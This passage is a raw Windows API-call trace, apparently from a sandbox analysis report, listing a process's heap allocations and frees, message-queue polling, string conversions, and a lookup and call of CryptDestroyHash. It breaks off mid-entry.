RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba078 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd618 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0181.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5a0 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0181.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd540 [0181.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0181.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0181.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0181.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0181.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0181.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0181.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0181.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda08 [0181.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0181.036] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0181.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0181.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0181.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0181.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0181.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0181.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0181.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0181.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0181.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0181.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0181.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0181.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0181.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0181.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0181.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0181.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0181.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0181.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0181.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0181.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0181.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0181.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0181.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0181.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0181.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0181.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0181.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0181.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0181.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0181.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0181.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0181.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d4c0 [0181.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x90d4c0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0181.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0181.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0181.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0181.039] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDestroyHash") returned 0x74f2df66 [0181.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0181.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0181.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0181.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0181.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0181.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0181.039] CryptDestroyHash (hHash=0x90af58) returned 1 [0181.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0181.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0181.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0181.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0181.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0181.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0181.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0181.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0181.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0181.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0181.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0181.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0181.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.041] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0181.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0181.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0181.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0181.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0181.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0181.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0181.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0181.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0181.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0181.044] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0181.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0181.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0181.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0181.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0181.045] PeekMessageW (in: lpMsg=0x87f36c, 